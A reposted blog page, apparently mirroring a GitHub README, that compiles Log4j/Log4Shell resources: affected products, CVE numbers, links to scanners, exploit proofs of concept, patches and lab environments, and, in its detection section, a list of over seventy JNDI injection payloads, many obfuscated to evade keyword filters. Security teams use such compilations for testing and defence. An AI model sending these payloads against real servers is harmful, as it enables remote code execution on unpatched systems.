vlambda Blog

[Repost] HackLog4j - The Eternal Evil Dragon


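00-Log4j Eternal Evil Dragon [2]
01-Log4j Basics [3]
02-Log4j Framework Identification [4]
03-Log4j Superstructure [5]
04-Log4j Vulnerability Summary [6]
05-Log4j Detection and Exploitation [7]
06-Log4j Vulnerability Remediation [8]
07-Log4j Analysis Articles [9]
08-Log4j Lab Environments [10]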

00-Log4j Eternal Evil Dragon

https://github.com/Goqi/ELong

01-Log4j Basics

https://github.com/apache/logging-log4j2

02-Log4j Framework Identification

To be updated

03-Log4j Superstructure

log4j + ? = rce !

Apache Flink
Apache Struts2
Apache Spark
Apache Storm
Apache Tomcat
Apache Solr
Apache Dubbo
Apache Druid
Apache OFBiz
Apache Flume
Redis
Logstash
ElasticSearch
Apache Kafka
Ghidra
Spring-Boot-starter-log4j2
VMware vCenter
Minecraft
......

https://fofa.so/static_pages/log4j2
https://github.com/cisagov/log4j-affected-db
https://github.com/YfryTchsGD/Log4jAttackSurface
https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes
https://github.com/CrackerCat/Log4jAttackSurface
https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core/usages
https://security.googleblog.com/2021/12/understanding-impact-of-apache-log4j.html
https://github.com/authomize/log4j-log4shell-affected
https://github.com/NS-Sp4ce/Vm4J

04-Log4j Vulnerability Summary

CVE-2021-45105
CVE-2021-44228
CVE-2021-4104
CVE-2019-17571
CVE-2017-5645

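05-Log4j Detection and Exploitation

How do you determine whether a website has the Log4j JNDI injection vulnerability?
How do you find Log4j JNDI injection vulnerabilities on an internal network?

1. Payload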

${jndi:ldap://127.0.0.1/poc}
${jndi:rmi://127.0.0.1/poc}
${jndi:dns://127.0.0.1/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1/poc}
${${::-j}ndi:rmi://127.0.0.1/poc}
${${lower:jndi}:${lower:rmi}://127.0.0.1/poc}
${${lower:${lower:jndi}}:${lower:rmi}://127.0.0.1/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://127.0.0.1/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://127.0.0.1/poc}
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}}://127.0.0.1/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1/poc}
$%7Bjndi:ldap://127.0.0.1/poc%7D
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}127.0.0.1/poc}
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://127.0.0.1/poc}
${jndi:${lower:l}${lower:d}a${lower:p}://127.0.0.1/poc}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://127.0.0.1/poc}
${${env:TEST:-j}ndi${env:TEST:-:}${env:TEST:-l}dap${env:TEST:-:}127.0.0.1/poc}
${jndi:${lower:l}${lower:d}ap://127.0.0.1/poc}
${jndi:ldap://127.0.0.1#127.0.0.1/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://k123.k123.k123/poc}
${${::-j}ndi:rmi://k123.k123.k123/ass}
${jndi:rmi://k8.k123.k123}
${${lower:jndi}:${lower:rmi}://k8.k123.k123/poc}
${${lower:${lower:jndi}}:${lower:rmi}://k8.k123.k123/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://k8.k123.k123/poc}
j${loWer:Nd}i${uPper::}
${jndi:ldaps://127.0.0.1/poc}
${jndi:iiop://127.0.0.1/poc}
${date:ldap://127.0.0.1/poc}
${java:ldap://127.0.0.1/poc}
${marker:ldap://127.0.0.1/poc}
${ctx:ldap://127.0.0.1/poc}
${lower:ldap://127.0.0.1/poc}
${upper:ldap://127.0.0.1/poc}
${main:ldap://127.0.0.1/poc}
${jvmrunargs:ldap://127.0.0.1/poc}
${sys:ldap://127.0.0.1/poc}
${env:ldap://127.0.0.1/poc}
${log4j:ldap://127.0.0.1/poc}
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:l}d${lower:a}${lower:p}://${hostName}.{{interactsh-url}}}
${jndi:rmi://127.0.0.1}/
${jnd${123%25ff:-${123%25ff:-i:}}ldap://127.0.0.1/poc}
${jndi:dns://127.0.0.1}
${j${k8s:k5:-ND}i:ldap://127.0.0.1/poc}
${j${k8s:k5:-ND}i:ldap${sd:k5:-:}//127.0.0.1/poc}
${j${k8s:k5:-ND}i${sd:k5:-:}ldap://127.0.0.1/poc}
${j${k8s:k5:-ND}i${sd:k5:-:}ldap${sd:k5:-:}//127.0.0.1/poc}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap://127.0.0.1/poc}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap{sd:k5:-:}//127.0.0.1/poc}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//127.0.0.1/poc}
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//127.0.0.1/poc
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}a${::-p}${sd:k5:-:}//127.0.0.1/poc}
${jndi:${lower:l}${lower:d}a${lower:p}://127.0.0.1}
${jnd${upper:i}:ldap://127.0.0.1/poc}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://127.0.0.1/poc}
${jndi:ldap://127.0.0.1#127.0.0.1:1389/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1/poc}
${${lower:jndi}:${lower:ldap}://127.0.0.1/poc}
${${::-j}ndi:rmi://127.0.0.1/poc}
${${lower:${lower:jndi}}:${lower:ldap}://127.0.0.1/poc}
${${lower:jndi}:${lower:rmi}://127.0.0.1/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:ldap}://127.0.0.1/poc}
${${lower:${lower:jndi}}:${lower:rmi}://127.0.0.1/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}d${lower:a}p://127.0.0.1/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://127.0.0.1/poc}
${j${env:DOESNOTEXIST:-}ndi:ldap://127.0.0.1/poc}
${j${env:DOESNOTEXIST:-}ndi:rmi://127.0.0.1/poc}
${${: : : : ::: :: :: : :::-j}ndi:ldap://127.0.0.1/poc}
${${: : : : ::: :: :: : :::-j}ndi:rmi://127.0.0.1/poc}
${${::::::::::::::-j}ndi:ldap://127.0.0.1/poc}
${${::::::::::::::-j}ndi:rmi://127.0.0.1/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1/poc}

https://github.com/trickest/log4j
https://github.com/test502git/log4j-fuzz-head-poc
https://github.com/woodpecker-appstore/log4j-payload-generator
https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words

2. Source Code Detection

https://github.com/google/log4jscanner
https://github.com/hupe1980/scan4log4shell
https://github.com/logpresso/CVE-2021-44228-Scanner
https://github.com/xsultan/log4jshield
https://github.com/Joefreedy/Log4j-Windows-Scanner
https://github.com/back2root/log4shell-rex
https://github.com/Neo23x0/log4shell-detector
https://github.com/dwisiswant0/look4jar
https://github.com/Qualys/log4jscanwin
https://github.com/lijiejie/log4j2_vul_local_scanner
https://github.com/palantir/log4j-sniffer
https://github.com/mergebase/log4j-detector
https://www.t00ls.cc/thread-63931-1-1.html
https://github.com/darkarnium/Log4j-CVE-Detect
https://github.com/whitesource/log4j-detect-distribution
https://github.com/fox-it/log4j-finder
https://github.com/webraybtl/Log4j

3. Detection with Outbound Connectivity

https://github.com/dorkerdevil/Log-4-JAM
https://github.com/adilsoybali/Log4j-RCE-Scanner
https://github.com/cisagov/log4j-scanner

4. Detection without Outbound Connectivity

https://github.com/For-ACGN/Log4Shell
https://github.com/proferosec/log4jScanner
https://github.com/Y0-kan/Log4jShell-Scan
https://github.com/j5s/Log4j2Scan
https://github.com/EmYiQing/JNDIScan

5. Active Scanning

https://github.com/ilsubyeega/log4j2-exploits
https://github.com/Cyronlee/log4j-rce

6. Passive Scanning

https://github.com/silentsignal/burp-log4shell
https://github.com/pmiaowu/log4jScan
https://github.com/guguyu1/log4j2_burp_scan
https://github.com/whwlsfb/Log4j2Scan
https://github.com/bigsizeme/Log4j-check
https://github.com/f0ng/log4j2burpscanner
https://github.com/pmiaowu/log4j2Scan
https://github.com/bit4woo/log4jScan
https://github.com/izj007/Log4j2Scan
https://github.com/gh0stkey/Log4j2-RCE-Scanner
https://github.com/p1n93r/Log4j2Scan
https://github.com/mostwantedduck/BurpLog4j2Scan
https://github.com/j3ers3/Log4Scan

7. Header Detection

https://github.com/fullhunt/log4j-scan
https://github.com/0xInfection/LogMePwn
https://github.com/TaroballzChen/CVE-2021-44228-log4jVulnScanner-metasploit

8. Request Parameter Detection

9. Other Tools

https://github.com/dbgee/log4j2_rce
https://github.com/ReadER-L/log4j-rce
https://github.com/HyCraftHD/Log4J-RCE-Proof-Of-Concept
https://github.com/Seayon/Log4j2RCE_Demo
https://github.com/elbosso/Log4J2CustomJMXAppender
https://github.com/ahus1/logging-and-tracing
https://github.com/stuartwdouglas/log4j-jndi-agent
https://github.com/xiajun325/apache-log4j-rce-poc
https://github.com/caoli5288/log4j2jndiinterceptor
https://github.com/y35uishere/Log4j2-CVE-2021-44228
https://github.com/ErdbeerbaerLP/log4jfix
https://github.com/0x0021h/apache-log4j-rce
https://github.com/Gav06/RceFix
https://github.com/UltraVanilla/LogJackFix
https://github.com/iamsino/log4j2-Exp
https://github.com/bkfish/Apache-Log4j-Learning
https://github.com/LoliKingdom/NukeJndiLookupFromLog4j
https://github.com/tangxiaofeng7/apache-log4j-poc
https://github.com/h1b1ki/apache-log4j-poc
https://github.com/EmptyIrony/Log4j2Fixer
https://github.com/AzisabaNetwork/Log4j2Fix
https://github.com/apple502j/Log4Jail
https://github.com/jacobtread/L4J-Vuln-Patch
https://github.com/stardust1900/log4j-2.15.0
https://github.com/nest-x/nestx-log4js
https://github.com/Marcelektro/Log4J-RCE-Implementation
https://github.com/jdremillard/json-logging
https://github.com/parayaluyanta/sell-logs-and-peace
https://github.com/albar965/atools
https://github.com/Al0sc/Log4j-rce
https://github.com/ven0n1/Log4jv2Maven
https://github.com/akunzai/log4j2-sendgrid-appender
https://github.com/inbug-team/Log4j_RCE_Tool
https://github.com/zlepper/CVE-2021-44228-Test-Server
https://github.com/webraybtl/Log4j
https://github.com/numanturle/Log4jNuclei
https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce
https://github.com/kozmer/log4j-shell-poc
https://github.com/hackerhackrat/Log4j2-RCE-burp-plugin
https://github.com/mzlogin/CVE-2021-44228-Demo
https://github.com/greymd/CVE-2021-44228
https://github.com/Cybereason/Logout4Shell
https://github.com/webraybtl/log4j-snort
https://github.com/corretto/hotpatch-for-apache-log4j2
https://github.com/alexandre-lavoie/python-log4rce
https://github.com/hillu/local-log4j-vuln-scanner
https://github.com/leonjza/log4jpwn
https://github.com/cyberstruggle/L4sh
https://github.com/cckuailong/log4shell_1.x
https://github.com/zhzyker/logmap
https://github.com/LoRexxar/log_dependency_checklist
https://github.com/0xDexter0us/Log4J-Scanner
https://github.com/cckuailong/Log4j_CVE-2021-45046
https://github.com/KpLi0rn/Log4j2Scan
https://github.com/righel/log4shell_nse
https://github.com/Ch0pin/log4JFrida
https://github.com/mycve/HTTPHeaderInjectBrowser
https://github.com/ihebski/log4j-Scanner
https://github.com/Yihsiwei/Log4j-exp
https://github.com/rz7d/log4j-force-upgrader
https://github.com/xsser/log4jdemoforRCE
https://github.com/e5g/Log-4J-Exploit-Fix
https://github.com/Re1own/Apache-log4j-POC
https://github.com/jas502n/Log4j2-CVE-2021-44228
https://github.com/ChloePrime/fix4log4j
https://github.com/toString122/log4j2_exp
https://github.com/shanfenglan/apache_log4j_poc
https://github.com/dbgee/CVE-2021-44228
https://github.com/lcosmos/apache-log4j-poc
https://github.com/aalex954/Log4PowerShell
https://github.com/fox-it/log4shell-pcaps
https://github.com/Qerim-iseni09/ByeLog4Shell

06-Log4j Vulnerability Remediation

https://github.com/360-CERT/Log4ShellPatch
https://github.com/javasec/log4j-patch
https://github.com/simonis/Log4jPatch
https://github.com/FrankHeijden/Log4jFix
https://github.com/Szczurowsky/Log4j-0Day-Fix
https://github.com/SumoLogic/sumologic-log4j2-appender
https://github.com/chaitin/log4j2-vaccine
https://github.com/zhangyoufu/log4j2-without-jndi
https://github.com/CreeperHost/Log4jPatcher
https://github.com/boundaryx/cloudrasp-log4j2
https://github.com/DichuuCraft/LOG4J2-3201-fix

07-Log4j Analysis Articles

https://lorexxar.cn/2021/12/10/log4j2-jndi
https://www.t00ls.cc/thread-63705-1-1.html

08-Log4j Lab Environments

https://hub.docker.com/u/vulfocus
https://github.com/jweny/log4j-web-env
https://github.com/fengxuangit/log4j_vuln
https://www.t00ls.cc/thread-63695-1-1.html
https://github.com/christophetd/log4shell-vulnerable-app
https://github.com/Adikso/minecraft-log4j-honeypot
https://github.com/try777-try777/reVul-apache-log4j2-rec
https://github.com/EmYiQing/Log4j2DoS
https://github.com/tothi/log4shell-vulnerable-app
https://github.com/Anonymous-ghost/log4jVul
https://github.com/cyberxml/log4j-poc


Stargazers over time

[11]


Reference Links

[1] 0e0w: https://github.com/0e0w
[2] 00-Log4j Eternal Evil Dragon: https://github.com/HackJava/HackLog4j2#00-log4j%E6%B0%B8%E6%81%92%E6%81%B6%E9%BE%99
[3] 01-Log4j Basics: https://github.com/HackJava/HackLog4j2#01-log4j%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86
[4] 02-Log4j Framework Identification: https://github.com/HackJava/HackLog4j2#02-log4j%E6%A1%86%E6%9E%B6%E8%AF%86%E5%88%AB
[5] 03-Log4j Superstructure: https://github.com/HackJava/HackLog4j2#03-log4j%E4%B8%8A%E5%B1%82%E5%BB%BA%E7%AD%91
[6] 04-Log4j Vulnerability Summary: https://github.com/HackJava/HackLog4j2#04-log4j%E6%BC%8F%E6%B4%9E%E6%B1%87%E6%80%BB
[7] 05-Log4j Detection and Exploitation: https://github.com/HackJava/HackLog4j2#05-log4j%E6%A3%80%E6%B5%8B%E5%88%A9%E7%94%A8
[8] 06-Log4j Vulnerability Remediation: https://github.com/HackJava/HackLog4j2#06-log4j%E6%BC%8F%E6%B4%9E%E4%BF%AE%E5%A4%8D
[9] 07-Log4j Analysis Articles: https://github.com/HackJava/HackLog4j2#07-log4j%E5%88%86%E6%9E%90%E6%96%87%E7%AB%A0
[10] 08-Log4j Lab Environments: https://github.com/HackJava/HackLog4j2#08-log4j%E9%9D%B6%E5%9C%BA%E7%8E%AF%E5%A2%83
[11] Stargazers over time: https://starchart.cc/0e0w/HackLog4j